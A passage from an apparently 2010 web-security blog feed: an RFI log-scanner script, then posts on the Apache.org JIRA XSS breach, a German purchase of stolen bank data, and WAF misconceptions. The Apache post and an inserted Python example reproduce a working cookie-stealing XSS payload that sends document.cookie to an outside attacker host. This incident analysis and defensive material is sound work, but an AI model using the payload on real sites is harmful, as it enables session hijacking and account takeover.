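    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec


def remote_inclusion_params(params, own_hosts):
    """Return (name, value) pairs whose value is an absolute URL to a host
    outside own_hosts. Comparison is on the parsed hostname, so userinfo,
    port and case tricks in the authority do not hide the destination."""
    hits = []
    for name, value in params:
        parts = urlsplit(value.strip())
        host = (parts.hostname or "").lower()
        if parts.scheme.lower() in REMOTE_SCHEMES and host and host not in own_hosts:
            hits.append((name, value))
    return hits


def scan_log(text, own_hosts):
    """Alerts for every request carrying at least one remote-URL parameter."""
    own = {h.lower() for h in own_hosts}
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = remote_inclusion_params(rec["params"], own)
        if hits:
            alerts.append({"ip": rec["ip"], "target": rec["target"], "params": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG, {"www.example.com"}):
        print(f"RFI attempt from {alert['ip']}: {alert['target']} {alert['params']}")
```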
RFI attacks are still a big problem and a surprising number of sites are still vulnerable even though newer versions of PHP have a more secure default configuration that prevents this exploit from working. As it happens with other types of software, organizations are just not able to upgrade their software in a timely manner to the newest versions that fix the flaws. </div><div><br /></div><div>It is a shame that the <a href="http://www.owasp.org/index.php/Top_10_2010-Release_Notes">new OWASP Top 10 Most Critical Web Application Security Risks</a> release has removed the old A3: Malicious File Execution category as RFIs were included in it. The stated rationale for removing this is -</div><div><span class="Apple-style-span" style=" line-height: 19px; font-family:sans-serif;font-size:13px;"><blockquote><i>REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. 
PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.</i></blockquote></span></div><div>While I don't disagree with some of this rationale, the fact is that there are still many, many sites that are vulnerable to RFI attacks, and recruiting the compromised web site into a Botnet Army is just one of the possible bad outcomes...</div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-76162332968665723172010-04-14T17:03:00.006-04:002010-04-15T11:48:25.584-04:00Apache.org Compromised Through XSS<i>Submitted By Ryan Barnett 04/14/2010</i><div><br /></div><div>One of the latest entries into the <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database">WASC Web Hacking Incident Database (WHID)</a> deserves highlighting.</div><div><div></div><blockquote><div><b>Entry Title:</b> WHID 2010-67: Apache.org hit by targeted XSS attack, passwords compromised</div><div><b>WHID ID:</b> 2010-67</div><div><b>Date Occurred:</b> April 9, 2010</div><div><b>Attack Method:</b> Cross Site Scripting (XSS), Brute Force</div><div><b>Application Weakness:</b> Improper Output Handling</div><div><b>Outcome:</b> Session Hijacking</div><div><b>Incident Description:</b> On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text:</div><div>ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [obscured]</div><div>Tinyurl is a URL redirection and shortening tool. This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. 
The attack was crafted to steal the session cookie from the user logged-in to JIRA. When this issue was opened against the Infrastructure team, several of our administrators clicked on the link. This compromised their sessions, including their JIRA administrator rights.</div><div><b>Attack Source Geography: </b></div><div><b>Attacked Entity Field: </b>Technology</div><div><b>Attacked Entity Geography: </b>USA</div><div>Reference: <a href="http://blogs.zdnet.com/security/?p=6123&tag=nl.e539">http://blogs.zdnet.com/security/?p=6123&tag=nl.e539</a></div></blockquote><div></div><div>The end URL destination that the attackers sent the Apache admins to was this (with some data obscured) -</div></div><div><blockquote>https://obscured/path/to/vuln/page.jsp?vulnerable_parameter_name=name;}catch(e){}%0D%0A--></script><noscript><meta%20http-equiv="refresh"%20content="0;url=http://pastie.org/904699"></noscript><br /><script>document.write('<<b>img%20src="http://teap.zzl.org/teap.php?data='%2bdocument.cookie%2b'"/>');</b>window.location="http://pastie.org/904699";<br /></script><script><!--&defaultColor=';try{//</blockquote>As you can see, the attack is using some HTML/JavaScript tricks to force the user's browser to send the "document.cookie" DOM object data off site to the attacker's cookie grabber app (teap.php). 
The attack payload uses an easy browser trick: by placing the JavaScript data inside of an HTML IMG tag, it gets around the DOM restrictions on one domain accessing cookie data from another domain.</div><div><br /></div><div>Here is how the XSS payload looks if echoed back from JIRA -</div><div><blockquote><div><script language="JavaScript" type="text/javascript"></div><div><!--</div><div>var defaultColor = ''<b>;try{//';</b></div><div>var choice = false;</div><div>var openerForm = opener.document.jiraform;</div><div>var openerEl = opener.document.jiraform.name;<b>}catch(e){}</b></div><div><b>--></script><noscript><meta equiv="refresh" content="0;url=http://pastie.org/904699"></noscript><script>document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'" />');window.location="http://pastie.org/904699";</script><script><!--;</b></div><div>function colorIn(color) {</div><div> if (!choice) {</div><div> openerEl.value = color;</div><div> document.f.colorVal.value = color;</div><div> }</div><div>}</div></blockquote><div>This attack also highlights the fact that URL Shortener applications (such as tinyurl in this case) can be abused by attackers to hide the destination URL payloads. There was some recent research done by ZScaler entitled "<a href="http://research.zscaler.com/2010/03/are-url-shorteners-really-dangerous.html">Are URL Shorteners Really Dangerous</a>"; however, it only focused on malware attacks through URL Shorteners and not XSS attack payloads. As you can see, URL Shorteners are still dangerous, as they can dupe an end user into clicking on them: there is no way to tell whether the end URL is dangerous until you actually click on it. This scenario is another great reason why a browser plugin such as <a href="http://noscript.net/">NoScript</a> is so important. 
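To show where the page went wrong and what the Chrome check mentioned later in this post is looking for, here is an added Python example (not code from the original post or from JIRA): a constructed stand-in for the vulnerable page rendered with and without JavaScript-context output encoding, plus the "script source found in request" heuristic run against both. The template, the helper names and the way the request is built are assumptions; the hosts and payload are the ones already quoted above.

```python
"""Added example, not code from the original post or from JIRA: a constructed
stand-in for the vulnerable page, the same page with JavaScript-context output
encoding, and the Chrome-style 'script source found in request' check that
the post mentions. Hosts and paths are the ones the post already shows."""
import json
import re
from urllib.parse import parse_qs, quote, unquote, urlencode, urlsplit

# Constructed template modelled on the echoed page in the post: one parameter
# lands inside a single-quoted JS string, the other in a property name.
TEMPLATE = (
    '<html><body><script language="JavaScript" type="text/javascript">\n'
    "<!--\n"
    "var defaultColor = '{defaultColor}';\n"
    "var choice = false;\n"
    "var openerForm = opener.document.jiraform;\n"
    "var openerEl = opener.document.jiraform.{name};\n"
    "function colorIn(color) {{\n"
    "  if (!choice) {{\n"
    "    openerEl.value = color;\n"
    "    document.f.colorVal.value = color;\n"
    "  }}\n"
    "}}\n"
    "-->\n"
    "</script></body></html>"
)

# The two parameter values from the post's URL, percent-decoded. The try/catch
# pair swallows the syntax errors the breakout would otherwise raise.
ATTACK_PARAMS = {
    "name": (
        "name;}catch(e){}\r\n--></script>"
        "<script>document.write('<img src=\"http://teap.zzl.org/teap.php?data='"
        "+document.cookie+'\" />');window.location=\"http://pastie.org/904699\";"
        "</script><script><!--"
    ),
    "defaultColor": "';try{//",
}
ATTACK_URL = ("https://obscured/path/to/vuln/page.jsp?"
              + urlencode(ATTACK_PARAMS, quote_via=quote))

IDENT_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*$")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def query_params(url):
    """First value of each query parameter, percent-decoded."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def render_vulnerable(url):
    """Reflects both parameters verbatim, which is what the echoed page shows."""
    p = query_params(url)
    return TEMPLATE.format(defaultColor=p.get("defaultColor", ""),
                           name=p.get("name", "name"))


def js_string_literal(value):
    """Encode a value for use inside a JS string literal in an inline script.
    json.dumps covers backslashes, double quotes and control characters; the
    extra escapes cover the single quote the template uses, '</script>' and
    '<!--' (which JSON leaves alone but the HTML parser acts on), and the
    two Unicode line terminators that JSON permits but JavaScript does not."""
    return (json.dumps(value)
            .replace("'", "\\u0027")
            .replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("\u2028", "\\u2028").replace("\u2029", "\\u2029"))


def render_hardened(url):
    """Same page with the string encoded for its context and the property
    name allow-listed; an identifier cannot be encoded, only validated."""
    p = query_params(url)
    name = p.get("name", "name")
    if not IDENT_RE.match(name):
        name = "name"
    literal = js_string_literal(p.get("defaultColor", ""))
    # TEMPLATE supplies the surrounding quotes, so drop json.dumps's own.
    return TEMPLATE.format(defaultColor=literal[1:-1], name=name)


def scripts_found_in_request(url, html, min_len=20):
    """The 2010 Chrome heuristic the post describes: flag every inline script
    in the response whose source also appears in the decoded request."""
    decoded_request = unquote(url)
    flagged = []
    for src in SCRIPT_RE.findall(html):
        src = src.strip()
        if len(src) >= min_len and src in decoded_request:
            flagged.append(src)
    return flagged


if __name__ == "__main__":
    for label, page in (("vulnerable", render_vulnerable(ATTACK_URL)),
                        ("hardened", render_hardened(ATTACK_URL))):
        hits = scripts_found_in_request(ATTACK_URL, page)
        print(f"{label}: {len(SCRIPT_RE.findall(page))} script block(s), "
              f"{len(hits)} flagged")
```

Marking the session cookie HttpOnly would additionally keep document.cookie from exposing it, but it would not stop the script injection itself, which is why the output encoding is the fix.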
As a test, I clicked on the same tinyurl link in Firefox with NoScript and got a warning message and this data was logged in the console -</div></div><div><blockquote><b>[NoScript XSS] Sanitized suspicious request. </b>Original URL [https://obscured/path/to/vuln/page.jsp?vulnerable_parameter_name=name;}catch(e){}%0D%0A--%3E%3C/script%3E%3Cnoscript%3E%3Cmeta%20http-equiv=%22refresh%22%20content=%220;url=http://pastie.org/904699%22%3E%3C/nos<br />cript%3E%3Cscript%3Edocument.write(%27%3Cimg%20src=%22http://teap.zzl.org/teap.php?data=%27%2bdocument.cookie%2b%27%22/%3E%27);window.location=%22http://pastie.org/904<br />699%22;%3C/script%3E%3Cscript%3E%3C!--&defaultColor=%27;try{//] <b>requested from [chrome://browser/content/browser.xul]. Sanitized URL:</b> [https://obscured/path/to/vuln/page.jsp?vulnerable_parameter_name=NAME%3B%7Dcatch%20e%20%7B%7D%20-%3E%20%2Fscript%3E%20noscript%3E%20meta%20http-equiv=%20refresh%20content=%200%3Burl=http://pastie.org/904699%22%3E%3C/noscri<br />pt%3E%3Cscript%3Edocument.write(%27%3Cimg%20src=%20http%3A%2F%2Fteap.zzl.org%2Fteap.php%3F<br />data=%20%2BDOCUMENT.COOKIE%2B%20%20%2F%3E%20%20%3Bwindow.LOCATION=%20http%3A%2F%2Fp<br />astie.org%2F904699%20%3B%20%2Fscript%3E%20script%3E%20!-&defaultColor=%20%3Btry%7B%2F%2F#376924726542634355].</blockquote><b>Thank You NoScript!</b></div><div><b><br /></b></div><div><b>Update - </b>I also tested Google Chrome's XSS prevention (comparing inbound payloads with outbound response body data) and it seemed to work as it did not execute the XSS code and the Developer tools console showed this message -</div><div><br /></div><div><span class="Apple-style-span" style=" color: rgb(255, 0, 0); white-space: pre-wrap; font-family:monospace;font-size:medium;">Refused to execute a JavaScript script. 
Source code of script found within request.</span></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-63340757173819825442010-04-08T11:27:00.004-04:002010-04-14T17:03:12.018-04:00German Government Pays Hacker For Stolen Bank Account Data<i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">By Ryan Barnett 04/08/2010</span></span></i><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></div><div> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><!--StartFragment--><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">The </span></span><a href="https://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?filter33485=&filter33487=2010-64&filter33477=&filter38336=&filter33483=&filter33473=&filter33465=&filter33467=&filter33469=&filter33471=&filter33475=&filter33479=&filter33481=&filter35431=#////////////filter33487:MjAxMC02NA==//"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">latest entry to the <span class="blsp-spelling-error" id="SPELLING_ERROR_0">WASC</span> Web Hacking Incident Database (<span class="blsp-spelling-error" id="SPELLING_ERROR_1">WHID</span>)</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> is pretty interesting (below). 
The attack method is currently unknown (most likely candidate is <span class="blsp-spelling-error" id="SPELLING_ERROR_2">SQL</span> Injection due to bulk extraction of account holder data) however this story is a really good discussion topic and is why it is being included in <span class="blsp-spelling-error" id="SPELLING_ERROR_3">WHID</span> at this time. </span></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></p> <p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">The short of it is that someone hacked into some banks in Germany and Switzerland and stole account data about customers. Many of the banks are used as havens for people to hide their money for tax evasion purposes. The banks identified that this happened and did not notify their customers that their data was stolen. Well, the attacker decided to sell the stolen account data to the German government who then used the data to track down the account holders who were hiding money. The German government is now seeking back taxes and penalties against the account holders. 
The final piece of the story that is interesting is that one account holder ended up suing (and won by the way) the Bank for not notifying him about the stolen data with the rationale being that if he had known then he could have come forward to the German government and avoided additional penalties during the grace period.</span></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></p> <p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">All I can say is WOW. All four players in this story (the account holder, the bank, the attacker and the German government) *all* have dirty hands... 
It will be interesting to see what plays out in the future and if other Governments adopt a similar philosophy of paying for stolen data.</span></span></p> <p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span style=" font-weight:600;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><br /></span></span></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Entry Title: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><span class="blsp-spelling-error" id="SPELLING_ERROR_4">WHID</span> 2010-64: Taxman rakes in hundreds of millions thanks to stolen bank data</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><span class="blsp-spelling-error" id="SPELLING_ERROR_5">WHID</span> ID:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> 2010-64</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Date <span class="blsp-spelling-corrected" 
id="SPELLING_ERROR_6">Occurred</span>:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> April 7, 2010</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attack Method:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"> Unknown</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Outcome: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Monetary Loss</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Incident Description: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">A fascinating story about how the German government has decided to buy stolen bank data in order to go after German citizens who have not paid taxes on their hidden accounts. 
</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">An interesting twist in another case involving <span class="blsp-spelling-error" id="SPELLING_ERROR_7">LGT</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_8">Treuhand</span>, a Bad Homburg business man won millions in damages in a suit against the bank for failing to reveal that his information was stolen along with hundreds of other account holders and sold to German authorities for a criminal investigation. He argued that if the bank had informed those on the list that their data had been sold, they could have turned themselves in, receiving temporary amnesty and much lower fines.</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attack Source Geography: </span></span></b></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attacked Entity Field: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Finance</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Attacked Entity Geography:</span></span></b><span class="Apple-style-span" style="font-family:arial;"><span 
class="Apple-style-span" style="font-size:small;"> Germany</span></span></p> <p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;">Reference: </span></span></b><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size:small;"><a href="http://www.thelocal.de/article.php?ID=26381">http://www.thelocal.de/article.php?ID=26381</a></span></span><!--EndFragment--></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><br /></span></p><p style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; -qt-user-state:0;"><span class="Apple-style-span" style="font-family:arial;"><b>Update</b> - Apparently, the attacker in this case was a former employee and stole the account data by burning them to CDs.</span></p></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com2tag:blogger.com,1999:blog-5361523904237597206.post-41956278492608555822010-04-07T08:43:00.007-04:002010-04-08T12:41:08.127-04:00WAF Confusion Continues<span style="font-style:italic;"><span class="Apple-style-span" style="font-size: small;">By Ryan Barnett 04/07/2010</span></span><span class="Apple-style-span" style="font-size: small;"><br /><br /></span><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Frost&Sullivan recently held an Analyst briefing entitled "</span><a href="http://www.frostandsullivan.com/prod/servlet/analyst-briefing-detail.pag?mode=open&sid=192378074"><span class="Apple-style-span" style="font-size: small;">Analyst Briefing: Web Application Firewall: A 
Critical Defense For an Information Centric World</span></a><span class="Apple-style-span" style="font-size: small;">" in which they provided an overview of the </span><span class="blsp-spelling-error" id="SPELLING_ERROR_0"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> market in the Asia Pacific region. </span><a href="http://www.slideshare.net/FrostandSullivan/web-application-firewall-waf-a-critical-defence-for-an-informationcentric-world"><span class="Apple-style-span" style="font-size: small;">Slides 5 and 6 of the presentation</span></a><span class="Apple-style-span" style="font-size: small;"> showed that there are still misconceptions about </span><span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> where organizations don't fully understand what they are and when they need them. 
There were two questions asked in the survey about </span><span class="blsp-spelling-error" id="SPELLING_ERROR_2"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> understanding.</span></span></div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yBOv0GXiI/AAAAAAAAAGw/TRi2SxR86q8/s1600/waf_confusion_1.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 221px;" src="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yBOv0GXiI/AAAAAAAAAGw/TRi2SxR86q8/s320/waf_confusion_1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5457378938819337762" /></a><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The first question was </span><b><i><span class="Apple-style-span" style="font-size: small;">"What is the first function that comes to mind when I mention the term "Web Application Firewall?"</span></i></b><span class="Apple-style-span" style="font-size: small;"> The top 6 responses are shown in the graphic on the right. As you can see, the two most telling responses were that 19.3% of respondents thought about Network Security. I attribute this response to two main factors:</span></span></div><div><ol><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">A lack of understanding of the threat. 
Many organizations don't understand that professional criminals' #1 targets are web applications.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">An unfortunate side-effect of the name WAF. Having the term "firewall" in the name understandably leads people to think of network security devices.</span></span></li></ol></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The other interesting response was that 13% thought about IDS/IPS. This also leads to two thoughts:</span></span></div><div><ol><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Many people are using a WAF as only an HTTP-aware IDS/IPS and utilizing only a negative security model.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Some of these respondents may not know that a WAF</span><span class="Apple-style-span" 
style="font-size: small;"> has other protection mechanisms beyond typical IDS/IPS capabilities. Items such as positive security, automated learning and session-based protections are what really differentiate WAFs from other security devices.</span></span></li></ol></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The second question in the survey was "Agreement Towards Statements Concerning Web Application Firewalls." They asked 6 questions, and the responses to two of them again show a lack of understanding of when/how WAFs can help.</span></span></div><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yNAKnQRBI/AAAAAAAAAG4/dmeqbv_P0-A/s1600/waf_confusion_2.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 320px; height: 220px;" src="http://3.bp.blogspot.com/_E0YEPhKPc2k/S7yNAKnQRBI/AAAAAAAAAG4/dmeqbv_P0-A/s320/waf_confusion_2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5457391882454713362" /></a><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><b><i><span class="Apple-style-span" style="font-size: small;">Having a powerful network firewall is sufficient to make up for 
a lack of a WAF</span></i></b></span><span class="Apple-style-span" style="font-size: small;"><br /></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">55% of respondents agreed with this statement. I believe that this viewpoint is somewhat related to the previous responses about a WAF being an HTTP-aware IDS/IPS. Network firewall vendors are promoting the concept of Deep Packet Inspection capabilities, which allow them to view application layer data; however, there are some real-world limitations that often crop up with regards to web traffic.</span></span></div><div><ul><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Access to SSL traffic - in order to decrypt the SSL streams to view the HTTP payloads, any security device must be able to import the SSL</span><span 
class="Apple-style-span" style="font-size: small;"> cert and private key of the destination app server. Many network firewalls do not have the capability so the web-based protection is only for clear-text port 80 traffic.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Only negative security/signatures - the protections are based only on known/public vulnerabilities and use signatures.</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Performance impact - network firewalls have to service many other protocols and the performance overhead of Deep Packet Inspection usually adds too much latency for real-world use.</span></span></li></ul><div><span class="Apple-style-span" style="font-family:arial;"><b><i><span class="blsp-spelling-error" id="SPELLING_ERROR_17"><span class="Apple-style-span" style="font-size: small;">WAF</span></span><span class="Apple-style-span" style="font-size: small;"> is only required if a company wants to be </span><span class="blsp-spelling-error" id="SPELLING_ERROR_18"><span class="Apple-style-span" style="font-size: small;">PCI</span></span><span class="Apple-style-span" style="font-size: small;">-</span><span class="blsp-spelling-error" id="SPELLING_ERROR_19"><span class="Apple-style-span" style="font-size: small;">DSS</span></span><span class="Apple-style-span" style="font-size: small;"> compliant</span></i></b></span></div></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">48.3% of respondents agreed with this comment which to me implies two things:</span></span></div><div><ol><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Organizations don't understand the true value of </span><span class="blsp-spelling-error" 
id="SPELLING_ERROR_20"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;"> which extend beyond the "Signature-Based, HTTP-Aware IDS/</span><span class="blsp-spelling-error" id="SPELLING_ERROR_21"><span class="Apple-style-span" style="font-size: small;">IPS</span></span><span class="Apple-style-span" style="font-size: small;">". This narrow use case excludes capabilities such as Application Defect Identification and Performance Events (such as identifying Application Layer </span><span class="blsp-spelling-error" id="SPELLING_ERROR_22"><span class="Apple-style-span" style="font-size: small;">DoS</span></span><span class="Apple-style-span" style="font-size: small;">).</span></span></li><li><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">This view echoes the comments made by </span><span class="blsp-spelling-error" id="SPELLING_ERROR_23"><span class="Apple-style-span" style="font-size: small;">Ofer</span></span><span class="Apple-style-span" style="font-size: small;"> </span><span class="blsp-spelling-error" id="SPELLING_ERROR_24"><span class="Apple-style-span" style="font-size: small;">Shezaf</span></span><span class="Apple-style-span" style="font-size: small;"> in his </span><a href="http://www.xiom.com/2010/01/10/curse-pci-wafs"><span class="Apple-style-span" style="font-size: small;">"The Curse of </span><span class="blsp-spelling-error" id="SPELLING_ERROR_25"><span class="Apple-style-span" style="font-size: small;">PCI</span></span><span class="Apple-style-span" style="font-size: small;"> for </span><span class="blsp-spelling-error" id="SPELLING_ERROR_26"><span class="Apple-style-span" style="font-size: small;">WAFs</span></span><span class="Apple-style-span" style="font-size: small;">"</span></a><span class="Apple-style-span" style="font-size: small;"> blog post. 
It seems like a bit of a Catch-22 with PCI and WAFs: on the one hand, PCI has raised the awareness of WAFs in general; on the other hand, people are now starting to see WAFs as necessary only if they have to comply with PCI.</span></span></li></ol><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">The end result of this survey shows that there is still much WAF awareness and education that needs to be done in the marketplace. 
Hopefully my blog posts are helping in this regard.</span></span></div></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-38492185781038695082010-04-05T11:10:00.011-04:002010-04-08T12:41:37.417-04:00Secure Coding Practices Survey Results<i><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">Submitted by Ryan Barnett 04/06/2010</span></span></i><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: small;">
